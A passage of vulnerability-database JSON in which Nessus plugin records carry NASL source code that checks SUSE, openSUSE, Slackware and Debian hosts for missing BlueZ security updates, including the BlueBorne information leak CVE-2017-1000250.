["CVE-2016-9800"], "modified": "2016-12-07T19:32:00", "cpe": ["cpe:/a:bluez:bluez:5.42"], "id": "CVE-2016-9800", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9800", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:bluez:bluez:5.42:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-02-01T06:50:51", "description": "This update for bluez fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2016-7837: Fixed possible buffer overflow, make sure we don't\nwrite past the end of the array.(bsc#1026652)\n\nCVE-2016-9800: Fix hcidump memory leak in pin_code_reply_dump()\n(bsc#1013721).\n\nCVE-2016-9801: Fixed a buffer overflow in set_ext_ctrl function\n(bsc#1013732)\n\nCVE-2016-9804: Fix hcidump buffer overflow in commands_dump()\n(bsc#1013877).\n\nCVE-2016-9918: Fixed an out-of-bounds read in packet_hexdump()\n(bsc#1015173)\n\nCVE-2017-1000250: Fixed a information leak in SDP (part of the\nrecently published BlueBorne vulnerabilities) (bsc#1057342)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 19, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-03-01T00:00:00", "title": "SUSE SLES12 Security Update : bluez (SUSE-SU-2019:0510-1) (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7837", "CVE-2017-1000250", "CVE-2016-9800", "CVE-2016-9801", "CVE-2016-9918", "CVE-2016-9804"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libbluetooth3-debuginfo", "p-cpe:/a:novell:suse_linux:bluez", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:bluez-debuginfo", "p-cpe:/a:novell:suse_linux:libbluetooth3", "p-cpe:/a:novell:suse_linux:bluez-debugsource"], "id": "SUSE_SU-2019-0510-1.NASL", "href": "https://www.tenable.com/plugins/nessus/122530", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0510-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122530);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2020/02/07\");\n\n script_cve_id(\"CVE-2016-7837\", \"CVE-2016-9800\", \"CVE-2016-9801\", \"CVE-2016-9804\", \"CVE-2016-9918\", \"CVE-2017-1000250\");\n\n script_name(english:\"SUSE SLES12 Security Update : bluez (SUSE-SU-2019:0510-1) (BlueBorne)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for bluez fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2016-7837: Fixed possible buffer overflow, make sure we don't\nwrite past the end of the array.(bsc#1026652)\n\nCVE-2016-9800: Fix hcidump memory leak in pin_code_reply_dump()\n(bsc#1013721).\n\nCVE-2016-9801: Fixed a buffer overflow in set_ext_ctrl function\n(bsc#1013732)\n\nCVE-2016-9804: Fix hcidump buffer overflow in commands_dump()\n(bsc#1013877).\n\nCVE-2016-9918: Fixed an out-of-bounds read in packet_hexdump()\n(bsc#1015173)\n\nCVE-2017-1000250: Fixed a information leak in SDP (part of the\nrecently published BlueBorne vulnerabilities) (bsc#1057342)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1013721\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1013732\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1013877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1015173\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1026652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7837/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9800/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9801/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9804/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9918/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000250/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190510-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?69fdcf82\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2019-510=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2019-510=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2019-510=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-7837\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bluez-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bluez-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libbluetooth3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libbluetooth3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/01\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"bluez-5.13-3.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"bluez-debuginfo-5.13-3.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"bluez-debugsource-5.13-3.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libbluetooth3-5.13-3.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libbluetooth3-debuginfo-5.13-3.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"bluez-5.13-3.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"bluez-debuginfo-5.13-3.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"bluez-debugsource-5.13-3.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libbluetooth3-5.13-3.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libbluetooth3-debuginfo-5.13-3.10.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:31:15", "description": "This update for bluez fixes the following vulnerabilities :\n\n - CVE-2016-7837: Buffer overflow in parse_line function\n (bsc#1026652)\n\n - CVE-2017-1000250: information disclosure vulnerability\n in service_search_attr_req (bsc#1057342)", "edition": 18, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-10-23T00:00:00", "title": "openSUSE Security Update : bluez (openSUSE-2017-1176) (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7837", "CVE-2017-1000250"], "modified": "2017-10-23T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bluez-test", "p-cpe:/a:novell:opensuse:bluez-debuginfo", "p-cpe:/a:novell:opensuse:libbluetooth3-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bluez-devel-32bit", "p-cpe:/a:novell:opensuse:libbluetooth3-debuginfo", "p-cpe:/a:novell:opensuse:libbluetooth3-32bit", "p-cpe:/a:novell:opensuse:bluez-devel", "p-cpe:/a:novell:opensuse:bluez-cups-debuginfo", "cpe:/o:novell:opensuse:42.3", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:bluez-cups", "p-cpe:/a:novell:opensuse:bluez-test-debuginfo", "p-cpe:/a:novell:opensuse:bluez", "p-cpe:/a:novell:opensuse:bluez-debugsource", "p-cpe:/a:novell:opensuse:libbluetooth3"], "id": "OPENSUSE-2017-1176.NASL", "href": "https://www.tenable.com/plugins/nessus/104080", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1176.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104080);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-7837\", \"CVE-2017-1000250\");\n\n script_name(english:\"openSUSE Security Update : bluez (openSUSE-2017-1176) (BlueBorne)\");\n script_summary(english:\"Check for the openSUSE-2017-1176 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for bluez fixes the following vulnerabilities :\n\n - CVE-2016-7837: Buffer overflow in parse_line function\n (bsc#1026652)\n\n - CVE-2017-1000250: information disclosure vulnerability\n in service_search_attr_req (bsc#1057342)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1026652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1057342\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bluez packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bluez-cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bluez-cups-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bluez-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bluez-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bluez-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bluez-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bluez-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bluez-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libbluetooth3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libbluetooth3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libbluetooth3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libbluetooth3-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"bluez-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"bluez-cups-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"bluez-cups-debuginfo-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"bluez-debuginfo-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"bluez-debugsource-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"bluez-devel-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"bluez-test-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"bluez-test-debuginfo-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libbluetooth3-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libbluetooth3-debuginfo-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"bluez-devel-32bit-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libbluetooth3-32bit-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libbluetooth3-debuginfo-32bit-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bluez-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bluez-cups-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bluez-cups-debuginfo-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bluez-debuginfo-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bluez-debugsource-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bluez-devel-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bluez-test-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bluez-test-debuginfo-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libbluetooth3-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libbluetooth3-debuginfo-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"bluez-devel-32bit-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libbluetooth3-32bit-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libbluetooth3-debuginfo-32bit-5.41-6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez / bluez-cups / bluez-cups-debuginfo / bluez-debuginfo / etc\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T09:11:04", "description": "New bluez packages are available for Slackware 13.1, 13.37, 14.0,\n14.1, 14.2, and -current to fix a security issue.", "edition": 27, "cvss3": {"score": 6.5, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-18T00:00:00", "title": "Slackware 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : bluez (SSA:2017-258-01) (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "modified": "2017-09-18T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux", "p-cpe:/a:slackware:slackware_linux:bluez", "cpe:/o:slackware:slackware_linux:13.1"], "id": "SLACKWARE_SSA_2017-258-01.NASL", "href": "https://www.tenable.com/plugins/nessus/103255", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2017-258-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103255);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-1000250\");\n script_xref(name:\"SSA\", value:\"2017-258-01\");\n\n script_name(english:\"Slackware 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : bluez (SSA:2017-258-01) (BlueBorne)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New bluez packages are available for Slackware 13.1, 13.37, 14.0,\n14.1, 14.2, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.505994\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b4e6d349\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bluez package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/15\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.1\", pkgname:\"bluez\", pkgver:\"4.64\", pkgarch:\"i486\", pkgnum:\"2_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"bluez\", pkgver:\"4.64\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"bluez\", pkgver:\"4.91\", pkgarch:\"i486\", pkgnum:\"2_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"bluez\", pkgver:\"4.91\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"bluez\", pkgver:\"4.99\", pkgarch:\"i486\", pkgnum:\"3_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"bluez\", pkgver:\"4.99\", pkgarch:\"x86_64\", pkgnum:\"3_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"bluez\", pkgver:\"4.99\", pkgarch:\"i486\", pkgnum:\"4_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"bluez\", pkgver:\"4.99\", pkgarch:\"x86_64\", pkgnum:\"4_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"bluez\", pkgver:\"5.47\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"bluez\", pkgver:\"5.47\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"bluez\", pkgver:\"5.47\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"bluez\", pkgver:\"5.47\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:slackware_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-06T09:50:41", "description": "An information disclosure vulnerability was discovered in the Service\nDiscovery Protocol (SDP) in bluetoothd, allowing a proximate attacker\nto obtain sensitive information from bluetoothd process memory,\nincluding Bluetooth encryption keys.", "edition": 28, "cvss3": {"score": 6.5, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-14T00:00:00", "title": "Debian DSA-3972-1 : bluez - security update (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "modified": "2017-09-14T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bluez", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-3972.NASL", "href": "https://www.tenable.com/plugins/nessus/103198", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3972. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103198);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-1000250\");\n script_xref(name:\"DSA\", value:\"3972\");\n\n script_name(english:\"Debian DSA-3972-1 : bluez - security update (BlueBorne)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An information disclosure vulnerability was discovered in the Service\nDiscovery Protocol (SDP) in bluetoothd, allowing a proximate attacker\nto obtain sensitive information from bluetoothd process memory,\nincluding Bluetooth encryption keys.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=875633\"\n );\n 